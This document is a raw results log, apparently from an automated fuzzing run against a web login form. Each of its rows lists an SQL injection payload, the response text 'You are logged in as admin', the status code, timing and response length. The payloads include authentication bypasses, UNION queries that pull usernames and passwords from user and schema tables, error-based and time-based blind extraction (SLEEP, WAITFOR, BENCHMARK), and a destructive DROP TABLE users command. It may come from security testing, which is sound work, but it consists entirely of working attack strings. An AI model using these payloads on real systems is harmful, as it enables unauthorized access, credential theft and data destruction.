0		You are logged in as admin	200	7	false	false	60150
1	'or 1=1	You are logged in as admin	200	6	false	false	61992
2	'or 1=1--	You are logged in as admin	200	6	false	false	62007
4	'or 1=1/*	You are logged in as admin	200	6	false	false	62009
5	admin' --	You are logged in as admin	200	6	false	false	62001
6	admin' ##	You are logged in as admin	200	20	false	false	60150
7	admin'/*	You are logged in as admin	200	6	false	false	61996
8	admin' or '1'='1	You are logged in as admin	200	8	false	false	60150
9	admin' or '1'='1'--	You are logged in as admin	200	7	false	false	62045
11	admin' or '1'='1'/*	You are logged in as admin	200	23	false	false	62047
13	admin' or 1=1	You are logged in as admin	200	23	false	false	62009
14	admin' or 1=1--	You are logged in as admin	200	24	false	false	62022
16	admin' or 1=1/*	You are logged in as admin	200	24	false	false	62024
17	admin') or ('1'='1	You are logged in as admin	200	27	false	false	62052
18	admin') or ('1'='1'--	You are logged in as admin	200	14	false	false	62073
19	admin') or ('1'='1'##	You are logged in as admin	200	30	false	false	62073
20	admin') or ('1'='1'/*	You are logged in as admin	200	18	false	false	62073
21	admin') or '1'='1	You are logged in as admin	200	34	false	false	62045
22	admin') or '1'='1'--	You are logged in as admin	200	6	false	false	62066
23	admin') or '1'='1'##	You are logged in as admin	200	10	false	false	62066
24	admin') or '1'='1'/*	You are logged in as admin	200	12	false	false	62066
25	1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055	You are logged in as admin	200	22	false	false	62033
26	admin" --	You are logged in as admin	200	24	false	false	60150
27	admin" ##	You are logged in as admin	200	11	false	false	60150
28	admin"/*	You are logged in as admin	200	7	false	false	60150
29	admin" or "1"="1	You are logged in as admin	200	29	false	false	60150
30	admin" or "1"="1"--	You are logged in as admin	200	29	false	false	60150
31	admin" or "1"="1"##	You are logged in as admin	200	22	false	false	60150
32	admin" or "1"="1"/*	You are logged in as admin	200	26	false	false	60150
33	admin"or 1=1 or ""="	You are logged in as admin	200	26	false	false	60150
34	admin" or 1=1	You are logged in as admin	200	13	false	false	60150
35	admin" or 1=1--	You are logged in as admin	200	7	false	false	60150
36	admin" or 1=1##	You are logged in as admin	200	8	false	false	60150
37	admin" or 1=1/*	You are logged in as admin	200	26	false	false	60150
38	admin") or ("1"="1	You are logged in as admin	200	7	false	false	60150
39	admin") or ("1"="1"--	You are logged in as admin	200	10	false	false	60150
40	admin") or ("1"="1"##	You are logged in as admin	200	19	false	false	60150
41	admin") or ("1"="1"/*	You are logged in as admin	200	20	false	false	60150
42	admin") or "1"="1	You are logged in as admin	200	13	false	false	60150
43	admin") or "1"="1"--	You are logged in as admin	200	23	false	false	60150
44	admin") or "1"="1"##	You are logged in as admin	200	28	false	false	60150
45	admin") or "1"="1"/*	You are logged in as admin	200	26	false	false	60150
46	1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055	You are logged in as admin	200	18	false	false	60150
48	" OR "1"="1	You are logged in as admin	200	9	false	false	60150
49	OR 1=1	You are logged in as admin	200	12	false	false	60150
50	'; DROP TABLE users; --	You are logged in as admin	200	6	false	false	62065
51	admin'--	You are logged in as admin	200	6	false	false	61995
52	' OR '1'='1' --	You are logged in as admin	200	6	false	false	62047
54	' OR 1=1 --	You are logged in as admin	200	6	false	false	62023
56	' OR 1=1/*	You are logged in as admin	200	8	false	false	62016
57	' OR 'x'='x'	You are logged in as admin	200	21	false	false	62032
58	'' OR ''=''	You are logged in as admin	200	30	false	false	60150
59	'='	You are logged in as admin	200	21	false	false	60150
60	' LIKE '%'	You are logged in as admin	200	23	false	false	62017
61	' UNION SELECT NULL, NULL--	You are logged in as admin	200	15	false	false	62044
62	' UNION SELECT NULL, NULL, NULL--	You are logged in as admin	200	26	false	false	62060
63	' UNION SELECT username, password FROM users--	You are logged in as admin	200	24	false	false	62075
64	' UNION SELECT ALL FROM users--	You are logged in as admin	200	23	false	false	62060
65	' UNION SELECT 1, 'database' FROM information_schema.tables--	You are logged in as admin	200	5	false	false	62110
66	' UNION SELECT table_name, column_name FROM information_schema.columns--	You are logged in as admin	200	23	false	false	62121
67	' UNION SELECT @@version, NULL--	You are logged in as admin	200	8	false	false	62059
68	' UNION SELECT NULL, table_name FROM information_schema.tables WHERE table_schema=database()--	You are logged in as admin	200	6	false	false	62166
69	' UNION SELECT 1, database()--	You are logged in as admin	200	7	false	false	62057
70	' UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_name='users'--	You are logged in as admin	200	6	false	false	62174
71	'; SELECT 1/0--	You are logged in as admin	200	8	false	false	62039
72	' AND 1=CONVERT(int, (SELECT @@version))--	You are logged in as admin	200	7	false	false	62120
73	'; SELECT user, password FROM mysql.user WHERE 1=1--	You are logged in as admin	200	24	false	false	62148
74	' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@version), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--	You are logged in as admin	200	7	false	false	62303
75	' AND 1=CAST((CHR(113)||CHR(107)||CHR(98)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (1=1) THEN CHR(49) ELSE CHR(48) END))||CHR(113)||CHR(106)||CHR(107)||CHR(120)||CHR(113)) AS NUMERIC)--	You are logged in as admin	200	6	false	false	62526
76	' AND 1=UTL_INADDR.get_host_name((SELECT user FROM dual))--	You are logged in as admin	200	24	false	false	62121
77	' AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT user())))--	You are logged in as admin	200	6	false	false	62121
78	' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--	You are logged in as admin	200	9	false	false	62304
79	' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x ...	You are logged in as admin	200	15	false	false	62428
80	' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--	You are logged in as admin	200	8	false	false	62425
81	1' AND 1=1--	You are logged in as admin	200	25	false	false	62019
82	1' AND 1=2--	You are logged in as admin	200	7	false	false	62019
129	/*	You are logged in as admin	200	16	false	false	60150
130	'; WAITFOR DELAY '0:0:5'--	You are logged in as admin	200	8	false	false	62081
131	' AND 1=(SELECT COUNT(*) FROM tablenames);--	You are logged in as admin	200	23	false	false	62098
132	' AND 1=(SELECT TOP 1 CAST(table_name AS int) FROM information_schema.tables)--	You are logged in as admin	200	23	false	false	62215
133	' OR 1=(SELECT TOP 1 1 FROM information_schema.tables)--	You are logged in as admin	200	23	false	false	62145
134	' OR EXISTS(SELECT 1 FROM information_schema.tables WHERE table_name='users')--	You are logged in as admin	200	22	false	false	62146
135	' AND ascii(substring((SELECT @@version), 1, 1)) > 51 --	You are logged in as admin	200	29	false	false	62143
136	' AND LENGTH(USER()) > 1--	You are logged in as admin	200	5	false	false	62063
137	'+OR+NOT+DELAY+0:0:15	You are logged in as admin	200	5	false	false	62052
138	';WAITFOR DELAY '0:0:15'--	You are logged in as admin	200	8	false	false	62077
139	';WAITFOR DELAY '0:0:15'--	You are logged in as admin	200	7	false	false	62077
140	' AND CHAR(124)+USER()+CHAR(124)--	You are logged in as admin	200	5	false	false	62076
141	') AND '1'='1	You are logged in as admin	200	7	false	false	62042
142	') AND ('1'='1	You are logged in as admin	200	22	false	false	62049
143	' OR ''=''	You are logged in as admin	200	12	false	false	62026
144	' OR 1=1 --	You are logged in as admin	200	25	false	false	62023
145	1 AND (SELECT COUNT(*) FROM tablename) > 0 --	You are logged in as admin	200	28	false	false	60150
146	1' AND SLEEP(5)--	You are logged in as admin	200	15	false	false	62029
147	1' AND IF(ASCII(SUBSTRING((SELECT user()), 1, 1)) = 114, SLEEP(5), 0)--	You are logged in as admin	200	14	false	false	62193
148	1' AND BENCHMARK(5000000,MD5(1))--	You are logged in as admin	200	26	false	false	62061
149	1' AND IF(1=1,BENCHMARK(10000000,MD5(1)),0)--	You are logged in as admin	200	7	false	false	62097
150	1' AND IF(1=2,BENCHMARK(10000000,MD5(1)),0)--	You are logged in as admin	200	23	false	false	62097
151	1' AND IF((SELECT * FROM (SELECT(SLEEP(20)))a)--	You are logged in as admin	200	24	false	false	62115
152	1' OR pg_sleep(5)--	You are logged in as admin	200	7	false	false	62036
153	'; PG_SLEEP(5)--	You are logged in as admin	200	6	false	false	62046
154	' AND '1'='1	You are logged in as admin	200	6	false	false	60150
155	1 OR 1=1	You are logged in as admin	200	30	false	false	60150
156	1; WAITFOR DELAY '0:0:5'--	You are logged in as admin	200	7	false	false	62061
157	1' AND '1'='1	You are logged in as admin	200	8	false	false	60150
158	1' AND '1'='1'--	You are logged in as admin	200	25	false	false	62043
159	' OR 1=1--	You are logged in as admin	200	9	false	false	62014
161	' OR '1'='1'/*	You are logged in as admin	200	7	false	false	62043
162	1' OR '1'='1'/*	You are logged in as admin	200	5	false	false	62044
163	1' OR '1'='1'--	You are logged in as admin	200	24	false	false	62042
164	1' OR 'x'='x'--	You are logged in as admin	200	7	false	false	62042
165	' OR '1'='1' --	You are logged in as admin	200	18	false	false	62047
166	' OR 'x'='x'--	You are logged in as admin	200	9	false	false	62041
167	' OR 1=1 --	You are logged in as admin	200	12	false	false	62023
168	'; DROP TABLE users; --	You are logged in as admin	200	7	false	false	62065
169	' AND 1=1--	You are logged in as admin	200	6	false	false	62018
170	' AND 1=0--	You are logged in as admin	200	16	false	false	62018
171	' AND 'a'='a	You are logged in as admin	200	8	false	false	60150
172	' AND 'a'='b	You are logged in as admin	200	7	false	false	60150
173	1' AND 'a'='a	You are logged in as admin	200	7	false	false	60150
174	1' AND 'a'='b	You are logged in as admin	200	9	false	false	60150
181	1' OR 'a'='a	You are logged in as admin	200	9	false	false	60150
182	1' OR 'a'='b	You are logged in as admin	200	7	false	false	60150
183	1' OR 'a'='c	You are logged in as admin	200	29	false	false	60150